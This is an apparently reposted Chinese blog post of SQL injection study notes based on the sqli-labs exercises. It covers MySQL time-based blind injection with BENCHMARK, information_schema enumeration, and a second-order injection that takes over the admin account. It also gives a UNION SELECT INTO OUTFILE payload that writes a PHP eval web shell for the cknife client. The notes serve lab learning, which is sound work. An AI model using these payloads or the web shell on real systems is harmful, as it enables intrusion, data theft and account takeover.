当前位置:Gxlcms > 数据库问题 > sql注入学习笔记4

sql注入学习笔记4

时间:2021-07-01 10:21:17 帮助过:4人阅读

mysql的延时注入,当ascii(substr(database(),1,1))=105为真时返回1,为假则执行sleep(5),将会有5秒的延时报错

重复执行指定操作的函数

BENCHMARK(count,expr)函数将表达式expr重复执行count,然后返回执行时间。该函数可以用来判断MySQL处理表达式的速度。

UNION SELECT (IF(SUBSTRING(current,1,1)=CHAR(115),BENCHMARK(50000000,ENCODE(‘MSG‘,‘by 5 seconds‘)),null)),2,3 FROM (select database() as current) as tb1--+

1 truncvalue,precision)按精度(precision)截取某个数字,不进行舍入操作。
2 roundvalue,precision)根据给定的精度(precision)输入数值。
3 ceil (value) 产生大于或等于指定值(value)的最小整数。
4 floorvalue)与 ceil()相反,产生小于或等于指定值(value)的最小整数。
5 sign(value) 与绝对值函数ABS()相反。ABS()给出的是值的量而不是其符号,sign(value)则给出值的符号而不是量。

这是截断字符串常用函数的详解 http://www.cnblogs.com/lcamry/p/5504374.html

这是盲注一些解释  http://www.cnblogs.com/lcamry/p/5763129.html 

Mysql 文件导入导出 http://www.cnblogs.com/lcamry/p/5763111.html

Loadfile常用路径  http://www.cnblogs.com/lcamry/p/5729087.html

UNION SELECT 1,2,‘<?php @eval($_post["mima"])?>‘ into outfile "c:\\wamp\\www\\sqllib\\Less-7\\yijuhua.php"--+  

导入一句话木马,前提是有权限,导入后就可以用cknife连接

实验吧的一个实验  http://jxust.shiyanbar.com/course/50978/vid/1502

 

mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符。

下列字符受影响:

  • \x00
  • \n
  • \r
  • \
  • "
  • \x1a

获取数据库名

Select schema_name from information_schema.schemata

获取表名

Select table_name from information_schema.tables from where

table_name=’schema_name’

获取列名

Select column_name from information_schema.columns where table_name=’table_name’

获取内容

Select ‘column_name’from schema_name.table_name

SqlilabsLess-24关体验了下二次注入

先注册创建了个admin’#的账户,密码是123

 技术分享图片

 

 技术分享图片

 

可以进行更改密码的操作,更改密码时,将会发生二次注入,因为#将查询更新后面内容注释了

技术分享图片

 

可以看见通过改admin’#用户的密码,结果更改了admin的密码,这时我们就可以通过自己设置的密码登录管理员账户了,还一个和这有同样效果的是sql约束攻击,也能变相登录管理员密码,而不需要原来的管理员密码,当然管理员账户是需要知道的

 

 

sql注入学习笔记4

标签:笔记   format   内容   current   second   sign   trunc   enc   文件   

人气教程排行